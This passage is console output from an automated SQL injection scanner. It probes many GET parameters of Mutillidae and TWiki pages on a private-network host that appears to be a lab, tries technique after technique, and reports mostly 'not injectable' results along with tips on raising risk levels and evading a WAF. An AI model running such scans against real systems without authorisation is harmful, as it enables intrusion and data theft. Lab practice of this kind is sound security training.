[18:21:42] [INFO] testing 'MySQL inline queries'
[18:21:43] [INFO] testing 'PostgreSQL inline queries'
[18:21:43] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:21:43] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:21:43] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:21:44] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:21:44] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:21:44] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:21:45] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:21:45] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:21:46] [INFO] testing 'Oracle AND time-based blind'
[18:21:46] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:21:46] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:21:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:21:58] [WARNING] GET parameter 'template' is not injectable
[18:21:58] [INFO] testing if GET parameter 'param1' is dynamic
[18:21:58] [WARNING] GET parameter 'param1' does not appear dynamic
[18:21:58] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable
[18:21:58] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks
[18:21:58] [INFO] testing for SQL injection on GET parameter 'param1'
[18:21:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:22:00] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:22:00] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:22:01] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:22:01] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:22:02] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:22:03] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:22:03] [INFO] testing 'MySQL inline queries'
[18:22:03] [INFO] testing 'PostgreSQL inline queries'
[18:22:03] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:22:03] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:22:04] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:22:04] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:22:05] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:22:05] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:22:06] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:22:07] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:22:07] [INFO] testing 'Oracle AND time-based blind'
[18:22:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:22:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:22:24] [WARNING] GET parameter 'param1' is not injectable
[18:22:24] [INFO] testing if GET parameter 'param2' is dynamic
[18:22:24] [WARNING] GET parameter 'param2' does not appear dynamic
[18:22:24] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable
[18:22:24] [INFO] testing for SQL injection on GET parameter 'param2'
[18:22:24] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:22:26] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:22:26] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:22:27] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:22:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:22:28] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:22:29] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:22:29] [INFO] testing 'MySQL inline queries'
[18:22:29] [INFO] testing 'PostgreSQL inline queries'
[18:22:29] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:22:29] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:22:30] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:22:30] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:22:31] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:22:31] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:22:32] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:22:33] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:22:33] [INFO] testing 'Oracle AND time-based blind'
[18:22:34] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:22:35] [INFO] target URL appears to be UNION injectable with 1 columns
[18:22:35] [WARNING] applying generic concatenation with double pipes ('||')
[18:22:36] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql')
[18:22:43] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:22:51] [WARNING] GET parameter 'param2' is not injectable
[18:22:51] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=documentation/how-to-access-Mutillidae-over-Virtual-Box-network.php'
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=documentation/how-to-access-Mutillidae-over-Virtual-Box-network.php'
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/dav/?C=N;O=A'
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/dav/?C=S;O=D'
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=notes.php'
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=notes.php'
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=text-file-viewer.php'
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=text-file-viewer.php'
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=user-poll.php'
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=user-poll.php'
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=set-background-color.php'
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=set-background-color.php'
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=source-viewer.php'
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=source-viewer.php'
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=framing.php'
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=framing.php'
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/dav/?C=D;O=D'
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=register.php'
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=register.php'
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=view-someones-blog.php'
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=view-someones-blog.php'
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=captured-data.php'
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=captured-data.php'
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=installation.php'
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=installation.php'
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=html5-storage.php'
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=html5-storage.php'
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=dns-lookup.php'
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=dns-lookup.php'
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=show-log.php'
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=show-log.php'
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=login.php'
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=user-info.php'
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=credits.php'
URL 15:
GET http://192.168.1.113:80/mutillidae/index.php?page=redirectandlog.php&forwardurl=http://www.irongeek.com/
do you want to test this URL? [Y/n/q]
> Y
[18:22:51] [INFO] testing URL 'http://192.168.1.113:80/mutillidae/index.php?page=redirectandlog.php&forwardurl=http://www.irongeek.com/'
[18:22:51] [INFO] testing connection to the target URL
[18:22:51] [INFO] testing if the target URL is stable
[18:22:52] [INFO] target URL is stable
[18:22:52] [INFO] skipping previously processed GET parameter 'page'
[18:22:52] [INFO] testing if GET parameter 'forwardurl' is dynamic
[18:22:52] [INFO] confirming that GET parameter 'forwardurl' is dynamic
[18:22:52] [INFO] GET parameter 'forwardurl' is dynamic
[18:22:52] [WARNING] heuristic (basic) test shows that GET parameter 'forwardurl' might not be injectable
[18:22:52] [INFO] heuristic (XSS) test shows that GET parameter 'forwardurl' might be vulnerable to XSS attacks
[18:22:52] [INFO] testing for SQL injection on GET parameter 'forwardurl'
[18:22:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:22:53] [WARNING] reflective value(s) found and filtering out
[18:22:54] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:22:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:22:55] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:22:55] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:22:56] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:22:56] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:22:56] [INFO] testing 'MySQL inline queries'
[18:22:56] [INFO] testing 'PostgreSQL inline queries'
[18:22:56] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:22:56] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:22:57] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:22:57] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:22:58] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:22:58] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:22:59] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:22:59] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:22:59] [INFO] testing 'Oracle AND time-based blind'
[18:23:00] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:23:00] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:23:06] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:23:12] [WARNING] GET parameter 'forwardurl' is not injectable
[18:23:12] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[18:23:12] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=redirectandlog.php&forwardurl=http://www.owasp.org'
[18:23:12] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=redirectandlog.php&forwardurl=http://www.issa-kentuckiana.org/'
[18:23:12] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=redirectandlog.php&forwardurl=http://www.owasp.org/index.php/Louisville'
[18:23:12] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=redirectandlog.php&forwardurl=http://www.pocodoy.com/blog/'
[18:23:12] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=redirectandlog.php&forwardurl=http://www.room362.com/'
[18:23:12] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=redirectandlog.php&forwardurl=http://www.isd-podcast.com/'
[18:23:12] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=redirectandlog.php&forwardurl=http://pauldotcom.com/'
[18:23:12] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=redirectandlog.php&forwardurl=http://www.php.net/'
[18:23:12] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=redirectandlog.php&forwardurl=https://addons.mozilla.org/en-US/firefox/collections/jdruin/pr/'
[18:23:12] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=change-log.htm'
[18:23:12] [INFO] skipping 'http://192.168.1.113:80/dav/?C=M;O=D'
[18:23:12] [INFO] skipping 'http://192.168.1.113:80/mutillidae/?page=register.php'
[18:23:12] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=pen-test-tool-lookup.php'
[18:23:12] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=usage-instructions.php'
[18:23:12] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=documentation/vulnerabilities.php'
[18:23:12] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=password-generator.php'
[18:23:12] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=secret-administrative-pages.php'
[18:23:12] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=capture-data.php'
[18:23:12] [INFO] skipping 'http://192.168.1.113/twiki/bin/edit/Main/WebHome?t=1441456580'
URL 16:
GET http://192.168.1.113/twiki/bin/search/Main/SearchResult?scope=text&regex=on&search=Web *Home[^A-Za-z]
do you want to test this URL? [Y/n/q]
> Y
[18:23:12] [INFO] testing URL 'http://192.168.1.113/twiki/bin/search/Main/SearchResult?scope=text&regex=on&search=Web *Home[^A-Za-z]'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[18:23:12] [INFO] testing connection to the target URL
[18:23:12] [INFO] testing if the target URL is stable
[18:23:13] [INFO] target URL is stable
[18:23:13] [INFO] skipping previously processed URI parameter '#1*'
[18:23:13] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[18:23:13] [INFO] skipping 'http://192.168.1.113/twiki/bin/view/Main/WebHome?skin=print'
[18:23:13] [INFO] skipping 'http://192.168.1.113/twiki/bin/rdiff/Main/WebHome?rev1=1.21&rev2=1.20'
[18:23:13] [INFO] skipping 'http://192.168.1.113/twiki/bin/view/Main/WebHome?rev=1.20'
[18:23:13] [INFO] skipping 'http://192.168.1.113/twiki/bin/rdiff/Main/WebHome?rev1=1.20&rev2=1.19'
[18:23:13] [INFO] skipping 'http://192.168.1.113/twiki/bin/view/Main/WebHome?rev=1.19'
[18:23:13] [INFO] skipping 'http://192.168.1.113/twiki/bin/oops/Main/WebHome?template=oopsmore&param1=1.21&param2=1.21'
URL 17:
GET http://192.168.1.113:80/twiki/bin/edit/TWiki/TWikiSite?t=1441456597
do you want to test this URL? [Y/n/q]
> Y
[18:23:13] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/TWiki/TWikiSite?t=1441456597'
[18:23:13] [INFO] testing connection to the target URL
[18:23:13] [INFO] testing if the target URL is stable
[18:23:14] [INFO] target URL is stable
[18:23:14] [INFO] testing if GET parameter 't' is dynamic
[18:23:14] [WARNING] GET parameter 't' does not appear dynamic
[18:23:14] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable
[18:23:14] [INFO] testing for SQL injection on GET parameter 't'
[18:23:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:23:16] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:23:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:23:17] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:23:17] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:23:18] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:23:18] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:23:18] [INFO] testing 'MySQL inline queries'
[18:23:18] [INFO] testing 'PostgreSQL inline queries'
[18:23:19] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:23:19] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:23:19] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:23:20] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:23:20] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:23:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:23:21] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:23:22] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:23:22] [INFO] testing 'Oracle AND time-based blind'
[18:23:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:23:23] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:23:30] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:23:38] [WARNING] GET parameter 't' is not injectable
[18:23:38] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 18:
GET http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text&regex=on&search=TWiki *Site[^A-Za-z]
do you want to test this URL? [Y/n/q]
> Y
[18:23:38] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text&regex=on&search=TWiki *Site[^A-Za-z]'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[18:23:38] [INFO] testing connection to the target URL
[18:23:38] [INFO] testing if the target URL is stable
[18:23:39] [INFO] target URL is stable
[18:23:39] [INFO] testing if URI parameter '#1*' is dynamic
[18:23:39] [INFO] confirming that URI parameter '#1*' is dynamic
[18:23:39] [INFO] URI parameter '#1*' is dynamic
[18:23:39] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[18:23:39] [INFO] testing for SQL injection on URI parameter '#1*'
[18:23:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:23:39] [WARNING] reflective value(s) found and filtering out
[18:23:41] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:23:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:23:42] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:23:43] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:23:43] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:23:44] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:23:44] [INFO] testing 'MySQL inline queries'
[18:23:44] [INFO] testing 'PostgreSQL inline queries'
[18:23:45] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:23:45] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:23:45] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:23:46] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:23:46] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:23:47] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:23:47] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:23:48] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:23:49] [INFO] testing 'Oracle AND time-based blind'
[18:23:50] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:23:50] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:23:56] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:24:03] [WARNING] URI parameter '#1*' is not injectable
[18:24:03] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 19:
GET http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiSite?skin=print
do you want to test this URL? [Y/n/q]
> Y
[18:24:03] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiSite?skin=print'
[18:24:03] [INFO] testing connection to the target URL
[18:24:04] [INFO] testing if the target URL is stable
[18:24:04] [INFO] target URL is stable
[18:24:04] [INFO] testing if GET parameter 'skin' is dynamic
[18:24:05] [INFO] confirming that GET parameter 'skin' is dynamic
[18:24:05] [INFO] GET parameter 'skin' is dynamic
[18:24:05] [INFO] heuristics detected web page charset 'ascii'
[18:24:05] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable
[18:24:05] [INFO] testing for SQL injection on GET parameter 'skin'
[18:24:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:24:05] [WARNING] reflective value(s) found and filtering out
[18:24:06] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:24:06] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:24:07] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:24:08] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:24:08] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:24:09] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:24:09] [INFO] testing 'MySQL inline queries'
[18:24:09] [INFO] testing 'PostgreSQL inline queries'
[18:24:09] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:24:09] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:24:10] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:24:10] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:24:11] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:24:11] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:24:12] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:24:13] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:24:13] [INFO] testing 'Oracle AND time-based blind'
[18:24:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:24:14] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:24:21] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:24:28] [WARNING] GET parameter 'skin' is not injectable
[18:24:28] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 20:
GET http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiSite?rev1=1.22&rev2=1.21
do you want to test this URL? [Y/n/q]
> Y
[18:24:28] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiSite?rev1=1.22&rev2=1.21'
[18:24:28] [INFO] testing connection to the target URL
[18:24:28] [INFO] testing if the target URL is stable
[18:24:29] [INFO] target URL is stable
[18:24:29] [INFO] testing if GET parameter 'rev1' is dynamic
[18:24:29] [WARNING] GET parameter 'rev1' does not appear dynamic
[18:24:29] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable
[18:24:29] [INFO] heuristic (XSS) test shows that GET parameter 'rev1' might be vulnerable to XSS attacks
[18:24:29] [INFO] testing for SQL injection on GET parameter 'rev1'
[18:24:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:24:29] [WARNING] reflective value(s) found and filtering out
[18:24:31] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:24:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:24:32] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:24:32] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:24:33] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:24:34] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:24:34] [INFO] testing 'MySQL inline queries'
[18:24:34] [INFO] testing 'PostgreSQL inline queries'
[18:24:34] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:24:34] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:24:35] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:24:35] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:24:36] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:24:36] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:24:37] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:24:38] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:24:38] [INFO] testing 'Oracle AND time-based blind'
[18:24:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:24:39] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:24:47] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:24:55] [WARNING] GET parameter 'rev1' is not injectable
[18:24:55] [INFO] testing if GET parameter 'rev2' is dynamic
[18:24:55] [INFO] confirming that GET parameter 'rev2' is dynamic
[18:24:55] [INFO] GET parameter 'rev2' is dynamic
[18:24:55] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable
[18:24:55] [INFO] heuristic (XSS) test shows that GET parameter 'rev2' might be vulnerable to XSS attacks
[18:24:55] [INFO] testing for SQL injection on GET parameter 'rev2'
[18:24:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:24:57] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:24:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:24:59] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:24:59] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:25:00] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:25:01] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:25:01] [INFO] testing 'MySQL inline queries'
[18:25:02] [INFO] testing 'PostgreSQL inline queries'
[18:25:02] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:25:02] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:25:03] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:25:04] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:25:04] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
